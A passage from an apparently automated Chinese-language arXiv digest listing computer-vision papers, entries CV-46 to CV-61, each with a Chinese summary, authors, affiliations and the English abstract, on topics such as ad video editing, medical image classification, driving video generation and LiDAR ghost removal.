ratios to jointly optimize editing fidelity and structure preservation. Extensive experiments demonstrate that our method achieves superior structural consistency and editing quality compared with state-of-the-art approaches, across both local and global editing scenarios.
[CV-46] AutoCut: End-to-end advertisement video editing based on multimodal discretization and controllable generation CVPR2026
【速读】:该论文旨在解决短格式视频(short-form videos)在数字广告内容创作中因现有工作流程和AI工具分散、模态特定而导致的生产成本高、效率低的问题。解决方案的关键在于提出AutoCut框架,其核心创新是通过多模态离散化(multimodal discretization)构建统一的视频-音频-文本标记空间:利用专用编码器提取视频与音频特征,并采用残差向量量化(residual vector quantization)将其离散化为与文本表示对齐的统一标记,进而基于基础模型开发支持视频选择排序、脚本生成和背景音乐选择等任务的多模态大语言模型(multimodal large language model),最终实现端到端可控编辑与可部署长视频输出,显著提升一致性与可控性并降低制作成本与迭代时间。
链接: https://arxiv.org/abs/2603.28366
作者: Milton Zhou,Sizhong Qin,Yongzhi Li,Quan Chen,Peng Jiang
机构: Tsinghua University (清华大学); Kuaishou Technology (快手科技)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted by CVPR 2026
Abstract:Short-form videos have become a primary medium for digital advertising, requiring scalable and efficient content creation. However, current workflows and AI tools remain disjoint and modality-specific, leading to high production costs and low overall efficiency. To address this issue, we propose AutoCut, an end-to-end advertisement video editing framework based on multimodal discretization and controllable editing. AutoCut employs dedicated encoders to extract video and audio features, then applies residual vector quantization to discretize them into unified tokens aligned with textual representations, constructing a shared video-audio-text token space. Built upon a foundation model, we further develop a multimodal large language model for video editing through combined multimodal alignment and supervised fine-tuning, supporting tasks covering video selection and ordering, script generation, and background music selection within a unified editing framework. Finally, a complete production pipeline converts the predicted token sequences into deployable long video outputs. Experiments on real-world advertisement datasets show that AutoCut reduces production cost and iteration time while substantially improving consistency and controllability, paving the way for scalable video creation.
[CV-47] SEA: Evaluating Sketch Abstraction Efficiency via Element-level Commonsense Visual Question Answering
【速读】:该论文旨在解决现有草图(sketch)评估方法难以量化语义抽象效率的问题。传统方法依赖参考图像、低层视觉特征或识别准确率,无法捕捉草图的核心特性——抽象性(abstraction)。其解决方案的关键在于提出一种无参考的评估指标SEA(Sketch Evaluation metric for Abstraction efficiency),该指标通过分析草图中是否保留了类别定义性的视觉元素(由常识知识确定)来衡量其在视觉经济性下的语义保留程度,并借助视觉问答模型进行自动化判定,从而实现对草图抽象效率的定量评估。同时,作者构建了首个语义标注的草图数据集CommonSketch,为该指标提供系统性验证基础。
链接: https://arxiv.org/abs/2603.28363
作者: Jiho Park,Sieun Choi,Jaeyoon Seo,Minho Sohn,Yeana Kim,Jihie Kim
机构: Dongguk University (东国大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:A sketch is a distilled form of visual abstraction that conveys core concepts through simplified yet purposeful strokes while omitting extraneous detail. Despite its expressive power, quantifying the efficiency of semantic abstraction in sketches remains challenging. Existing evaluation methods that rely on reference images, low-level visual features, or recognition accuracy do not capture abstraction, the defining property of sketches. To address these limitations, we introduce SEA (Sketch Evaluation metric for Abstraction efficiency), a reference-free metric that assesses how economically a sketch represents class-defining visual elements while preserving semantic recognizability. These elements are derived per class from commonsense knowledge about features typically depicted in sketches. SEA leverages a visual question answering model to determine the presence of each element and returns a quantitative score that reflects semantic retention under visual economy. To support this metric, we present CommonSketch, the first semantically annotated sketch dataset, comprising 23,100 human-drawn sketches across 300 classes, each paired with a caption and element-level annotations. Experiments show that SEA aligns closely with human judgments and reliably discriminates levels of abstraction efficiency, while CommonSketch serves as a benchmark providing systematic evaluation of element-level sketch understanding across various vision-language models.
[CV-48] Optimized Weighted Voting System for Brain Tumor Classification Using MRI Images
【速读】:该论文旨在解决从MRI图像中准确分类脑肿瘤的问题,以支持有效的诊断与治疗规划。其解决方案的关键在于提出一种加权集成学习方法,通过融合深度学习模型(如ResNet101、DenseNet121、Xception、CNN-MRI、ResNet50结合边缘增强图像)与传统机器学习模型(如SVM和KNN结合HOG特征),并采用基于个体准确率的加权投票机制,使表现更优的模型在最终决策中拥有更大影响力,从而提升整体分类性能。此外,引入Balance Contrast Enhancement、K-means聚类和Canny边缘检测等图像处理技术进一步优化特征提取,实验表明该方法在Figshare和Kaggle MRI数据集上达到了当前最优的分类准确率。
链接: https://arxiv.org/abs/2603.28357
作者: Ha Anh Vu
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG)
备注:
Abstract:The accurate classification of brain tumors from MRI scans is essential for effective diagnosis and treatment planning. This paper presents a weighted ensemble learning approach that combines deep learning and traditional machine learning models to improve classification performance. The proposed system integrates multiple classifiers, including ResNet101, DenseNet121, Xception, CNN-MRI, and ResNet50 with edge-enhanced images, SVM, and KNN with HOG features. A weighted voting mechanism assigns higher influence to models with better individual accuracy, ensuring robust decision-making. Image processing techniques such as Balance Contrast Enhancement, K-means clustering, and Canny edge detection are applied to enhance feature extraction. Experimental evaluations on the Figshare and Kaggle MRI datasets demonstrate that the proposed method achieves state-of-the-art accuracy, outperforming existing models. These findings highlight the potential of ensemble-based learning for improving brain tumor classification, offering a reliable and scalable framework for medical image analysis.
[CV-49] VistaGEN: Consistent Driving Video Generation with Fine-Grained Control Using Multiview Visual-Language Reasoning
【速读】:该论文旨在解决长视频生成中缺乏细粒度对象级控制能力的问题,尤其是在多样化驾驶场景下难以保持时空一致性。现有方法虽在可控性、分辨率和时长方面取得进展,但无法精确操控特定实体(如3D物体、图像或文本描述),且在长时间序列中易出现不一致现象。解决方案的关键在于引入多视角视觉-语言推理机制,通过将视觉-语言特征注入多视角视频生成器以实现细粒度控制,并提出多视角视觉-语言评估器(Multiview Vision-Language Evaluator, MV-VLM)来自动评估生成内容的时空一致性,从而构建“生成-评估-再生”的闭环机制,确保输出高质量且连贯的驾驶视频,同时引入对象级精修模块对不合格结果进行迭代优化,显著提升长尾对象的生成效果与整体一致性。
链接: https://arxiv.org/abs/2603.28353
作者: Li-Heng Chen,Ke Cheng,Yahui Liu,Lei Shi,Shi-Sheng Huang,Hongbo Fu
机构: Hong Kong University of Science and Technology (香港科技大学); Meituan, Inc. (美团); Beijing Normal University (北京师范大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Driving video generation has achieved much progress in controllability, video resolution, and length, but fails to support fine-grained object-level controllability for diverse driving videos, while preserving the spatiotemporal consistency, especially in long video generation. In this paper, we present a new driving video generation technique, called VistaGEN, which enables fine-grained control of specific entities, including 3D objects, images, and text descriptions, while maintaining spatiotemporal consistency in long video sequences. Our key innovation is the incorporation of multiview visual-language reasoning into the long driving video generation. To this end, we inject visual-language features into a multiview video generator to enable fine-grained controllability. More importantly, we propose a multiview vision-language evaluator (MV-VLM) to intelligently and automatically evaluate spatiotemporal consistency of the generated content, thus formulating a novel generation-evaluation-regeneration closed-loop generation mechanism. This mechanism ensures high-quality, coherent outputs, facilitating the creation of complex and reliable driving scenarios. Besides, within the closed-loop generation, we introduce an object-level refinement module to refine the unsatisfied results evaluated from the MV-VLM and then feed them back to the video generator for regeneration. Extensive evaluation shows that our VistaGEN achieves diverse driving video generation results with fine-grained controllability, especially for long-tail objects, and much better spatiotemporal consistency than previous approaches.
[CV-50] Integrating Multimodal Large Language Model Knowledge into Amodal Completion
【速读】:该论文旨在解决**非可见部分补全(amodal completion)**问题,即在图像中重建被遮挡的人或物体的缺失区域。传统方法要么仅依赖视觉生成模型的图像生成能力(缺乏对现实世界的物理知识),要么仅在分割阶段引入先验知识,无法有效指导补全过程。解决方案的关键在于提出AmodalCG框架,该框架利用多模态大语言模型(Multimodal Large Language Models, MLLMs)提供的现实世界知识来引导补全:首先判断目标物体是否严重遮挡以决定是否调用MLLM;若需引导,则由MLLM推理缺失区域的范围与内容;最后通过视觉生成模型整合这些信息并迭代优化补全结果,从而显著提升补全质量。
链接: https://arxiv.org/abs/2603.28333
作者: Heecheol Yun,Eunho Yang
机构: KAIST; AITRICS
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注:
Abstract:With the widespread adoption of autonomous vehicles and robotics, amodal completion, which reconstructs the occluded parts of people and objects in an image, has become increasingly crucial. Just as humans infer hidden regions based on prior experience and common sense, this task inherently requires physical knowledge about real-world entities. However, existing approaches either depend solely on the image generation ability of visual generative models, which lack such knowledge, or leverage it only during the segmentation stage, preventing it from explicitly guiding the completion process. To address this, we propose AmodalCG, a novel framework that harnesses the real-world knowledge of Multimodal Large Language Models (MLLMs) to guide amodal completion. Our framework first assesses the extent of occlusion to selectively invoke MLLM guidance only when the target object is heavily occluded. If guidance is required, the framework further incorporates MLLMs to reason about both the (1) extent and (2) content of the missing regions. Finally, a visual generative model integrates these guidance and iteratively refines imperfect completions that may arise from inaccurate MLLM guidance. Experimental results on various real-world images show impressive improvements compared to all existing works, suggesting MLLMs as a promising direction for addressing challenging amodal completion.
[CV-51] SFDemorpher: Generalizable Face Demorphing for Operational Morphing Attack Detection
【速读】:该论文旨在解决人脸伪造攻击(face morphing attacks)对生物识别安全构成的威胁,特别是针对文档颁发至边境管控阶段中因身份混杂导致的验证漏洞问题。现有检测方法在实际部署中存在泛化能力不足的问题,主要受限于训练数据稀缺及假设所有输入均为伪造样本的局限性。解决方案的关键在于提出SFDemorpher框架,通过在联合StyleGAN潜在空间与高维特征空间中进行身份解耦(identity disentanglement),并采用双通道训练策略同时处理伪造和真实文档样本,结合以合成身份为主的混合语料库增强模型对未见分布的鲁棒性,从而显著提升检测性能与可解释性。
链接: https://arxiv.org/abs/2603.28322
作者: Raul Ismayilov,Luuk Spreeuwers
机构: University of Twente (特温特大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Face morphing attacks compromise biometric security by creating document images that verify against multiple identities, posing significant risks from document issuance to border control. Differential Morphing Attack Detection (D-MAD) offers an effective countermeasure, particularly when employing face demorphing to disentangle identities blended in the morph. However, existing methods lack operational generalizability due to limited training data and the assumption that all document inputs are morphs. This paper presents SFDemorpher, a framework designed for the operational deployment of face demorphing for D-MAD that performs identity disentanglement within joint StyleGAN latent and high-dimensional feature spaces. We introduce a dual-pass training strategy handling both morphed and bona fide documents, leveraging a hybrid corpus with predominantly synthetic identities to enhance robustness against unseen distributions. Extensive evaluation confirms state-of-the-art generalizability across unseen identities, diverse capture conditions, and 13 morphing techniques, spanning both border verification and the challenging document enrollment stage. Our framework achieves superior D-MAD performance by widening the margin between the score distributions of bona fide and morphed samples while providing high-fidelity visual reconstructions facilitating explainability.
[CV-52] Beyond Scanpaths: Graph-Based Gaze Simulation in Dynamic Scenes
【速读】:该论文旨在解决现有计算机视觉应用中人类注意力建模不准确的问题,尤其是在汽车安全领域,传统方法通常将注视点简化为显著性图或扫描路径,仅隐式地处理注视动态。其核心解决方案是将注视建模视为一个自回归动力系统,显式地对原始注视轨迹进行时间上的展开,并以注视历史和环境演化为条件。关键创新在于引入了基于注视中心图的Affinity Relation Transformer(ART)来捕捉驾驶员注视、交通物体与道路结构之间的异质交互关系,并通过Object Density Network(ODN)预测下一步的注视分布,从而有效建模复杂环境中注意力转移的随机性和对象中心特性。该方法直接在原始注视数据上训练,无需固定点过滤,生成更自然的注视轨迹、扫描路径和显著性图,为动态环境中人类注意力的时序建模提供了新范式。
链接: https://arxiv.org/abs/2603.28319
作者: Luke Palmer,Petar Palasek,Hazem Abdelkawy
机构: GlimpseML; Toyota Motor Europe
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Accurately modelling human attention is essential for numerous computer vision applications, particularly in the domain of automotive safety. Existing methods typically collapse gaze into saliency maps or scanpaths, treating gaze dynamics only implicitly. We instead formulate gaze modelling as an autoregressive dynamical system and explicitly unroll raw gaze trajectories over time, conditioned on both gaze history and the evolving environment. Driving scenes are represented as gaze-centric graphs processed by the Affinity Relation Transformer (ART), a heterogeneous graph transformer that models interactions between driver gaze, traffic objects, and road structure. We further introduce the Object Density Network (ODN) to predict next-step gaze distributions, capturing the stochastic and object-centric nature of attentional shifts in complex environments. We also release Focus100, a new dataset of raw gaze data from 30 participants viewing egocentric driving footage. Trained directly on raw gaze, without fixation filtering, our unified approach produces more natural gaze trajectories, scanpath dynamics, and saliency maps than existing attention models, offering valuable insights for the temporal modelling of human attention in dynamic environments.
[CV-53] Prototype-Enhanced Multi-View Learning for Thyroid Nodule Ultrasound Classification
【速读】:该论文旨在解决甲状腺结节超声影像分类中深度学习模型在跨设备或跨临床环境部署时鲁棒性与泛化能力不足的问题(即模型容易捕捉到图像异质性带来的虚假相关性,而非可靠的诊断特征)。其解决方案的关键在于提出了一种原型增强的多视角学习框架(PEMV-thyroid),通过从多个特征视角学习互补表示,并利用混合原型信息进行决策边界修正,从而在异质成像条件下实现更稳定的表征学习,显著提升了模型在跨域场景下的诊断准确性和泛化性能。
链接: https://arxiv.org/abs/2603.28315
作者: Yangmei Chen,Zhongyuan Zhang,Xikun Zhang,Xinyu Hao,Mingliang Hou,Renqiang Luo,Ziqi Xu
机构: Jilin University (吉林大学); RMIT University (皇家墨尔本理工大学); Dalian University of Technology (大连理工大学); Jinan University (暨南大学)
类目: Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG)
备注: 6 pages, IWCMC 2026 accepted
Abstract:Thyroid nodule classification using ultrasound imaging is essential for early diagnosis and clinical decision-making; however, despite promising performance on in-distribution data, existing deep learning methods often exhibit limited robustness and generalisation when deployed across different ultrasound devices or clinical environments. This limitation is mainly attributed to the pronounced heterogeneity of thyroid ultrasound images, which can lead models to capture spurious correlations rather than reliable diagnostic cues. To address this challenge, we propose PEMV-thyroid, a Prototype-Enhanced Multi-View learning framework that accounts for data heterogeneity by learning complementary representations from multiple feature perspectives and refining decision boundaries through a prototype-based correction mechanism with mixed prototype information. By integrating multi-view representations with prototype-level guidance, the proposed approach enables more stable representation learning under heterogeneous imaging conditions. Extensive experiments on multiple thyroid ultrasound datasets demonstrate that PEMV-thyroid consistently outperforms state-of-the-art methods, particularly in cross-device and cross-domain evaluation scenarios, leading to improved diagnostic accuracy and generalisation performance in real-world clinical settings. The source code is available at this https URL.
[CV-54] DinoDental: Benchmarking DINOv3 as a Unified Vision Encoder for Dental Image Analysis
【速读】:该论文旨在解决牙科影像领域中专家标注数据稀缺且成本高昂的问题,从而限制了人工智能(AI)在牙科中的发展。其解决方案的关键在于引入DinoDental这一统一基准,系统评估自监督视觉基础模型DINOv3是否可作为无需领域特定预训练的即插即用编码器,在全景X光片和口内照片等多种牙科图像任务(包括分类、检测与实例分割)中实现可靠迁移。实验表明,DINOv3在牙科图像分析中具备强大通用性,尤其在口内图像理解及边界敏感的密集预测任务上优势显著,同时通过缩放模型规模、调整输入分辨率及对比冻结特征、全量微调与低秩适应(LoRA)等策略,验证了其高效适配潜力。
链接: https://arxiv.org/abs/2603.28297
作者: Kun Tang,Xinquan Yang,Mianjie Zheng,Xuefen Liu,Xuguang Li,Xiaoqi Guo,Ruihan Chen,Linlin Shen,He Meng
机构: 1. Tsinghua University (清华大学); 2. Peking University (北京大学); 3. Chinese Academy of Sciences (中国科学院)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:The scarcity and high cost of expert annotations in dental imaging present a significant challenge for the development of AI in dentistry. DINOv3, a state-of-the-art, self-supervised vision foundation model pre-trained on 1.7 billion images, offers a promising pathway to mitigate this issue. However, its reliability when transferred to the dental domain, with its unique imaging characteristics and clinical subtleties, remains unclear. To address this, we introduce DinoDental, a unified benchmark designed to systematically evaluate whether DINOv3 can serve as a reliable, off-the-shelf encoder for comprehensive dental image analysis without requiring domain-specific pre-training. Constructed from multiple public datasets, DinoDental covers a wide range of tasks, including classification, detection, and instance segmentation on both panoramic radiographs and intraoral photographs. We further analyze the model’s transfer performance by scaling its size and input resolution, and by comparing different adaptation strategies, including frozen features, full fine-tuning, and the parameter-efficient Low-Rank Adaptation (LoRA) method. Our experiments show that DINOv3 can serve as a strong unified encoder for dental image analysis across both panoramic radiographs and intraoral photographs, remaining competitive across tasks while showing particularly clear advantages for intraoral image understanding and boundary-sensitive dense prediction. Collectively, DinoDental provides a systematic framework for comprehensively evaluating DINOv3 in dental analysis, establishing a foundational benchmark to guide efficient and effective model selection and adaptation for the dental AI community.
[CV-55] rraSky3D: Multi-View Reconstructions of European Landmarks in 4K CVPR
【速读】:该论文旨在解决当前3D重建相关研究中高质量、大规模公共数据集稀缺的问题。现有数据集普遍存在分辨率低、场景数量有限、图像质量不一(因来源于互联网)或仅适用于特定采集场景等局限性,难以满足日益复杂的3D重建算法训练与评估需求。为此,作者构建了TerraSky3D数据集,其关键在于提供了5万张高分辨率图像,覆盖150个地面、航空及混合视角的场景,聚焦欧洲地标建筑,并配套精确的相机标定参数、位姿信息和深度图,从而为训练和评估现代3D重建流水线提供具有挑战性的基准数据。
链接: https://arxiv.org/abs/2603.28287
作者: Mattia D’Urso,Yuxi Hu,Christian Sormann,Mattia Rossi,Friedrich Fraundorfer
机构: Graz University of Technology (格拉茨工业大学); Sony (索尼)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted at 3DMV at CVPR Workshop 2026
Abstract:Despite the growing need for data of more and more sophisticated 3D reconstruction pipelines, we can still observe a scarcity of suitable public datasets. Existing 3D datasets are either low resolution, limited to a small amount of scenes, based on images of varying quality because retrieved from the internet, or limited to specific capturing scenarios. Motivated by this lack of suitable 3D datasets, we captured TerraSky3D, a high-resolution large-scale 3D reconstruction dataset comprising 50,000 images divided into 150 ground, aerial, and mixed scenes. The dataset focuses on European landmarks and comes with curated calibration data, camera poses, and depth maps. TerraSky3D tries to answer the need for challenging dataset that can be used to train and evaluate 3D reconstruction-related pipelines. Comments: Accepted at 3DMV at CVPR Workshop 2026 Subjects: Computer Vision and Pattern Recognition (cs.CV) Cite as: arXiv:2603.28287 [cs.CV] (or arXiv:2603.28287v1 [cs.CV] for this version) https://doi.org/10.48550/arXiv.2603.28287 Focus to learn more arXiv-issued DOI via DataCite (pending registration)
[CV-56] DiffAttn: Diffusion-Based Drivers Visual Attention Prediction with LLM -Enhanced Semantic Reasoning
【速读】:该论文旨在解决智能车辆中驾驶员视觉注意力预测的准确性问题,以更好地模拟人类驾驶者的感知模式并提升对潜在危险的预判能力。其核心挑战在于如何建模复杂的局部与全局场景特征,并增强对安全关键线索的敏感性。解决方案的关键在于提出DiffAttn框架,该框架将注意力预测任务建模为条件扩散去噪过程,采用Swin Transformer作为编码器提取多尺度特征,并设计融合特征金字塔的解码器实现跨层交互与密集多尺度条件扩散,从而联合优化去噪学习和细粒度场景上下文建模;同时引入大语言模型(Large Language Model, LLM)层增强自上而下的语义推理能力,显著提升对安全相关提示的响应灵敏度。
链接: https://arxiv.org/abs/2603.28251
作者: Weimin Liu,Qingkun Li,Jiyuan Qiu,Wenjun Wang,Joshua H. Meng
机构: Tsinghua University (清华大学); Chinese Academy of Sciences (中国科学院); University of Copenhagen (哥本哈根大学); University of California, Berkeley (加州大学伯克利分校)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注:
Abstract:Drivers’ visual attention provides critical cues for anticipating latent hazards and directly shapes decision-making and control maneuvers, where its absence can compromise traffic safety. To emulate drivers’ perception patterns and advance visual attention prediction for intelligent vehicles, we propose DiffAttn, a diffusion-based framework that formulates this task as a conditional diffusion-denoising process, enabling more accurate modeling of drivers’ attention. To capture both local and global scene features, we adopt Swin Transformer as encoder and design a decoder that combines a Feature Fusion Pyramid for cross-layer interaction with dense, multi-scale conditional diffusion to jointly enhance denoising learning and model fine-grained local and global scene contexts. Additionally, a large language model (LLM) layer is incorporated to enhance top-down semantic reasoning and improve sensitivity to safety-critical cues. Extensive experiments on four public datasets demonstrate that DiffAttn achieves state-of-the-art (SoTA) performance, surpassing most video-based, top-down-feature-driven, and LLM-enhanced baselines. Our framework further supports interpretable driver-centric scene understanding and has the potential to improve in-cabin human-machine interaction, risk perception, and drivers’ state measurement in intelligent vehicles.
[CV-57] winMixing: A Shuffle-Aware Feature Interaction Model for Multi-Task Segmentation
【速读】:该论文旨在解决自动驾驶中高效且高精度的语义分割问题,特别是针对可行驶区域(drivable-area)和车道(lane)分割任务,在低成本硬件上实现实时性能与准确率之间的平衡。解决方案的关键在于提出TwinMixing模型,其核心创新包括:1)采用共享编码器与任务专用解码器结构,实现特征共享与任务特异性优化;2)在编码器中设计高效金字塔混合(Efficient Pyramid Mixing, EPM)模块,通过分组卷积、深度可分离空洞卷积和通道混洗操作,在低计算成本下扩展感受野;3)每个解码器引入双分支上采样(Dual-Branch Upsampling, DBU)块,结合可学习的转置卷积精细分支与无参数双线性插值粗粒度分支,实现细节丰富且空间一致的特征重建。该设计使模型在保持极低参数量(如base配置仅0.43M参数)和计算复杂度(3.95 GFLOPs)的同时,达到优异的分割性能(drivable-area mIoU达92.0%,lane IoU达32.3%)。
链接: https://arxiv.org/abs/2603.28233
作者: Minh-Khoi Do,Huy Che,Dinh-Duy Phan,Duc-Khai Lam,Duc-Lung Vu
机构: University of Information Technology (越南信息技术大学)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注:
Abstract:Accurate and efficient perception is essential for autonomous driving, where segmentation tasks such as drivable-area and lane segmentation provide critical cues for motion planning and control. However, achieving high segmentation accuracy while maintaining real-time performance on low-cost hardware remains a challenging problem. To address this issue, we introduce TwinMixing, a lightweight multi-task segmentation model designed explicitly for drivable-area and lane segmentation. The proposed network features a shared encoder and task-specific decoders, enabling both feature sharing and task specialization. Within the encoder, we propose an Efficient Pyramid Mixing (EPM) module that enhances multi-scale feature extraction through a combination of grouped convolutions, depthwise dilated convolutions and channel shuffle operations, effectively expanding the receptive field while minimizing computational cost. Each decoder adopts a Dual-Branch Upsampling (DBU) Block composed of a learnable transposed convolution-based Fine detailed branch and a parameter-free bilinear interpolation-based Coarse grained branch, achieving detailed yet spatially consistent feature reconstruction. Extensive experiments on the BDD100K dataset validate the effectiveness of TwinMixing across three configurations - tiny, base, and large. Among them, the base configuration achieves the best trade-off between accuracy and computational efficiency, reaching 92.0% mIoU for drivable-area segmentation and 32.3% IoU for lane segmentation with only 0.43M parameters and 3.95 GFLOPs. Moreover, TwinMixing consistently outperforms existing segmentation models on the same tasks, as illustrated in Fig. 1. Thanks to its compact and modular design, TwinMixing demonstrates strong potential for real-time deployment in autonomous driving and embedded perception systems. The source code: this https URL.
[CV-58] Ghost-FWL: A Large-Scale Full-Waveform LiDAR Dataset for Ghost Detection and Removal CVPR2026
【速读】:该论文旨在解决移动式激光雷达(LiDAR)在复杂场景中因玻璃和高反射表面导致的多路径激光回波所产生虚假点云(ghost points)问题,这些问题严重损害了三维建图与定位精度。传统去鬼方法依赖密集点云中的几何一致性,在移动LiDAR稀疏且动态的数据上失效。论文的关键解决方案是利用全波形激光雷达(full-waveform LiDAR, FWL),其可捕捉完整的时域强度波形而非仅峰值距离信息,从而提供区分真实反射与鬼点的关键线索。研究构建了首个大规模标注的移动FWL数据集Ghost-FWL(含24K帧、75亿个峰值级标注),并提出基于FWL的基线模型及FWL-MAE自监督表示学习方法,实验证明该方案显著提升鬼点去除准确率,并有效改善下游任务如LiDAR-SLAM(轨迹误差降低66%)和3D目标检测(误报减少50倍)。
链接: https://arxiv.org/abs/2603.28224
作者: Kazuma Ikeda,Ryosei Hara,Rokuto Nagata,Ozora Sako.Zihao Ding,Takahiro Kado,Ibuki Fujioka,Taro Beppu,Mariko Isogawa,Kentaro Yoshioka
机构: Keio University (庆应义塾大学); Sony Semiconductor Solutions (索尼半导体解决方案)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted to CVPR 2026 (Main)
Abstract:LiDAR has become an essential sensing modality in autonomous driving, robotics, and smart-city applications. However, ghost points (or ghosts), which are false reflections caused by multi-path laser returns from glass and reflective surfaces, severely degrade 3D mapping and localization accuracy. Prior ghost removal relies on geometric consistency in dense point clouds, failing on mobile LiDAR’s sparse, dynamic data. We address this by exploiting full-waveform LiDAR (FWL), which captures complete temporal intensity profiles rather than just peak distances, providing crucial cues for distinguishing ghosts from genuine reflections in mobile scenarios. As this is a new task, we present Ghost-FWL, the first and largest annotated mobile FWL dataset for ghost detection and removal. Ghost-FWL comprises 24K frames across 10 diverse scenes with 7.5 billion peak-level annotations, which is 100x larger than existing annotated FWL datasets. Benefiting from this large-scale dataset, we establish a FWL-based baseline model for ghost detection and propose FWL-MAE, a masked autoencoder for efficient self-supervised representation learning on FWL data. Experiments show that our baseline outperforms existing methods in ghost removal accuracy, and our ghost removal further enhances downstream tasks such as LiDAR-based SLAM (66% trajectory error reduction) and 3D object detection (50x false positive reduction). The dataset and code is publicly available and can be accessed via the project page: this https URL
[CV-59] Explaining CLIP Zero-shot Predictions Through Concepts CVPR2026
【速读】:该论文旨在解决大规模视觉语言模型(如CLIP)在零样本图像识别中预测结果缺乏可解释性的问题,同时克服概念瓶颈模型(Concept Bottleneck Models)因依赖概念标注监督而难以泛化到未见类别的局限。其解决方案的关键在于提出EZPC方法,通过将CLIP的联合图像-文本嵌入投影到由语言描述学习的概念空间中,实现无需额外监督即可对CLIP的预测提供忠实且透明的概念级解释;该投影通过对齐与重建目标联合优化,确保概念激活既保留CLIP的语义结构又具备人类可理解性。
链接: https://arxiv.org/abs/2603.28211
作者: Onat Ozdemir,Anders Christensen,Stephan Alaniz,Zeynep Akata,Emre Akbas
机构: University of Edinburgh (爱丁堡大学); Middle East Technical University (METU) (中地中海科技大学); Orbital (轨道公司); DTU Compute, Technical University of Denmark (丹麦技术大学计算机系); Dept. of Biology, University of Copenhagen (哥本哈根大学生物系); LTCI, Télécom Paris, Institut Polytechnique de Paris (巴黎电信学院LTCI实验室,巴黎综合理工学院); Technical University of Munich (TUM) (慕尼黑工业大学); Helmholtz Munich (慕尼黑亥姆霍兹研究中心); MCML; MDSI; Robotics AI Center (ROMER), METU (中地中海科技大学机器人与人工智能中心)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted to CVPR 2026
Abstract:Large-scale vision-language models such as CLIP have achieved remarkable success in zero-shot image recognition, yet their predictions remain largely opaque to human understanding. In contrast, Concept Bottleneck Models provide interpretable intermediate representations by reasoning through human-defined concepts, but they rely on concept supervision and lack the ability to generalize to unseen classes. We introduce EZPC that bridges these two paradigms by explaining CLIP’s zero-shot predictions through human-understandable concepts. Our method projects CLIP’s joint image-text embeddings into a concept space learned from language descriptions, enabling faithful and transparent explanations without additional supervision. The model learns this projection via a combination of alignment and reconstruction objectives, ensuring that concept activations preserve CLIP’s semantic structure while remaining interpretable. Extensive experiments on five benchmark datasets, CIFAR-100, CUB-200-2011, Places365, ImageNet-100, and ImageNet-1k, demonstrate that our approach maintains CLIP’s strong zero-shot classification accuracy while providing meaningful concept-level explanations. By grounding open-vocabulary predictions in explicit semantic concepts, our method offers a principled step toward interpretable and trustworthy vision-language models. Code is available at this https URL.
[CV-60] A Closer Look at Cross-Domain Few-Shot Object Detection: Fine-Tuning Matters and Parallel Decoder Helps CVPR2026
【速读】:该论文旨在解决少样本目标检测(Few-shot Object Detection, FSOD)中因训练样本稀缺导致的优化不稳定和泛化能力不足的问题。其解决方案的关键在于提出一种混合集成解码器(hybrid ensemble decoder),该结构由一个共享的分层解码层与多个并行的解码分支组成,每个分支使用从共享层继承或新初始化的去噪查询(denoising queries)以增强预测多样性;同时引入统一的渐进式微调框架与基于平台感知的学习率调度策略,从而在不增加额外参数的前提下提升模型泛化性能,并实现稳定高效的少样本适应。
链接: https://arxiv.org/abs/2603.28182
作者: Xuanlong Yu,Youyang Sha,Longfei Liu,Xi Shen,Di Yang
机构: Intellindust AI Lab; Suzhou Institute for Advanced Research, USTC
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted at CVPR 2026
Abstract:Few-shot object detection (FSOD) is challenging due to unstable optimization and limited generalization arising from the scarcity of training samples. To address these issues, we propose a hybrid ensemble decoder that enhances generalization during fine-tuning. Inspired by ensemble learning, the decoder comprises a shared hierarchical layer followed by multiple parallel decoder branches, where each branch employs denoising queries either inherited from the shared layer or newly initialized to encourage prediction diversity. This design fully exploits pretrained weights without introducing additional parameters, and the resulting diverse predictions can be effectively ensembled to improve generalization. We further leverage a unified progressive fine-tuning framework with a plateau-aware learning rate schedule, which stabilizes optimization and achieves strong few-shot adaptation without complex data augmentations or extensive hyperparameter tuning. Extensive experiments on CD-FSOD, ODinW-13, and RF100-VL validate the effectiveness of our approach. Notably, on RF100-VL, which includes 100 datasets across diverse domains, our method achieves an average performance of 41.9 in the 10-shot setting, significantly outperforming the recent approach SAM3, which obtains 35.7. We further construct a mixed-domain test set from CD-FSOD to evaluate robustness to out-of-distribution (OOD) samples, showing that our proposed modules lead to clear improvement gains. These results highlight the effectiveness, generalization, and robustness of the proposed method. Code is available at: this https URL.
[CV-61] oLL: Topological Layout Learning with Structural Multi-view Augmentation for 3D Scene Graph Pretraining
【速读】:该论文旨在解决3D场景图(3DSG)生成中因数据稀缺导致的泛化能力受限问题,现有方法要么依赖大量谓词标注(predicate annotations),要么因物体先验过强而忽略谓词关系学习,难以提供无标签且鲁棒的自监督预训练任务。其解决方案的关键在于提出一种拓扑布局学习(Topological Layout Learning, ToLL)框架,核心创新包括:1)设计锚点条件下的拓扑几何推理机制(Anchor-Conditioned Topological Geometry Reasoning),利用稀疏锚点的空间先验通过图神经网络(GNN)恢复零中心子图的全局布局,并由谓词特征严格调控,从而强制学习谓词关系;2)构建结构化多视角增强策略(Structural Multi-view Augmentation),避免语义污染并借助自蒸馏提升表征质量。实验证明,该方法在3DSSG数据集上显著提升了表示质量,优于当前最优基线。
链接: https://arxiv.org/abs/2603.28178
作者: Yucheng Huang,Luping Ji,Xiangwei Jiang,Wen Li,Mao Ye
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Under Reivew
